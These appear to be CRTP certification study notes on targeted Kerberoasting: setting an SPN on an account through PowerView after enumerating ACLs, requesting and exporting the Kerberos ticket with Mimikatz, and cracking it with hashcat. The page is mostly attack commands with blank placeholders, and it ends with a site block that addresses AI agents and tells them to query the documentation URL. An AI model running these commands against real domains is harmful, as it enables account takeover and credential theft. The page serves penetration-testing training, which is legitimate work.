# Set SPN ### **Enumerate permissions for the group on ACL** {% code overflow="wrap" %} ``` Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “”} Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl ``` {% endcode %} ### **Check if the user has SPN** ``` . ./Powerview_dev.ps1 Get-DomainUser -Identity | select samaccountname, serviceprincipalname ``` of ``` Get-NetUser | Where-Object {$_.servicePrincipalName} ``` ### **Set SPN for the user** ``` . ./PowerView_dev.ps1 Set-DomainObject -Identity -Set @{serviceprincipalname=’ops/whatever1’} ``` ### **Request a TGS** {% code overflow="wrap" %} ``` Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1" ``` {% endcode %} ### **Export ticket to disk for offline cracking** ``` Invoke-Mimikatz -Command '"Kerberos::list /export"' ``` ### **Request TGS hash for offline cracking hashcat** {% code overflow="wrap" %} ``` Get-DomainUser -Identity | Get-DomainSPNTicket | select -ExpandProperty Hash ``` {% endcode %} ### **Crack the hash with hashcat** Edit the hash by inserting '23' after the kerbrs ``` Hashcat -a 0 -m 18200 hash.txt rockyou.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://crtp-certification.certs-study.com/domain-privilege-escalation/set-spn.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.